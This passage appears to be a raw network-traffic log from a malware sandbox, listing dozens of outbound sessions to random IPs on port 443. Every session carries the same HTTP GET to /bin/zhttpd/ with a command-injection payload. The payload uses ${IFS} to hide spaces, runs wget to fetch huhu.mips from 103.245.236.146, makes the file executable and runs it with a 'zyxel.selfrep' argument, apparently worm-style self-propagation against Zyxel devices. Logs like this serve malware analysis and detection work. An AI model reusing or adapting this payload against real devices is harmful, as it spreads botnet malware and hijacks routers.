                                                  Jan 19, 2024 18:23:48.910546064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2662192.168.2.13448741.103.197.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910592079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2663192.168.2.1343056148.6.27.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910650969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2664192.168.2.133829620.117.166.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910687923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2665192.168.2.1345418111.160.210.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910732985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2666192.168.2.135686872.24.84.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910765886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2667192.168.2.1333304155.164.8.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910803080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2668192.168.2.1340526198.216.77.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910933018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2669192.168.2.134553251.41.238.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910964966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2670192.168.2.133697467.250.224.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.910994053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2671192.168.2.134711862.188.234.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911041021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2672192.168.2.134261473.32.35.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911089897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2673192.168.2.1334462191.213.118.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911114931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2674192.168.2.1348112137.55.78.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911134005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2675192.168.2.1336338160.20.71.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911179066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2676192.168.2.1338306184.128.93.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911199093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2677192.168.2.136012647.175.134.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911258936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2678192.168.2.1341950161.22.165.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911290884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2679192.168.2.1332924203.119.184.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911330938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2680192.168.2.135649675.122.57.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911359072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2681192.168.2.1352016111.163.55.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911389112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2682192.168.2.1348034189.42.129.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911448002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2683192.168.2.1340210161.231.176.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911472082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2684192.168.2.135999450.122.14.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911518097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2685192.168.2.1352496177.46.31.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911561966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2686192.168.2.1344600110.188.242.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911581039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2687192.168.2.135863658.96.25.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911628008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2688192.168.2.133323865.27.111.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911659956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2689192.168.2.1352652191.77.96.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911695957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2690192.168.2.135236814.222.215.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911725998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2691192.168.2.135886635.251.174.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911767006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2692192.168.2.1354148100.20.106.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911814928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2693192.168.2.1360380103.209.202.5443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911850929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2694192.168.2.135431637.166.7.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911900997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2695192.168.2.1358114106.161.70.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911956072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2696192.168.2.1343912155.235.71.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.911993980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2697192.168.2.1352882207.54.39.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912025928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2698192.168.2.1334602199.212.198.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912065029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2699192.168.2.1349020152.79.105.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912122965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2700192.168.2.1341036107.119.22.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912167072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2701192.168.2.1357398195.26.65.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912218094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2702192.168.2.1344260156.133.8.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912257910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2703192.168.2.1350138108.44.193.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912297010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2704192.168.2.134879827.174.70.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912338018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2705192.168.2.134783477.159.86.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912389994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2706192.168.2.1354264114.12.18.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912435055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2707192.168.2.1334606152.20.59.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912471056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2708192.168.2.133703658.31.17.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912530899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2709192.168.2.134725014.98.41.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912559986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2710192.168.2.1343496192.204.57.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912602901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2711192.168.2.1351946165.66.235.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912636995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2712192.168.2.1351384202.174.113.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912689924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2713192.168.2.1352834108.175.93.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912735939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2714192.168.2.135114453.166.235.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912753105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2715192.168.2.1359910105.177.177.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912806988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2716192.168.2.134525097.5.150.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912851095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2717192.168.2.13378149.121.231.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912878036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2718192.168.2.134541013.223.46.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912910938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2719192.168.2.134707274.158.19.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912938118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2720192.168.2.1335620186.145.186.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.912986994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2721192.168.2.1351378195.24.184.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913018942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2722192.168.2.1334388171.157.5.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913064003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2723192.168.2.1332828149.232.96.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:48.913094044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2724192.168.2.133947461.16.14.125443
                                                  TimestampBytes transferredDirectionData
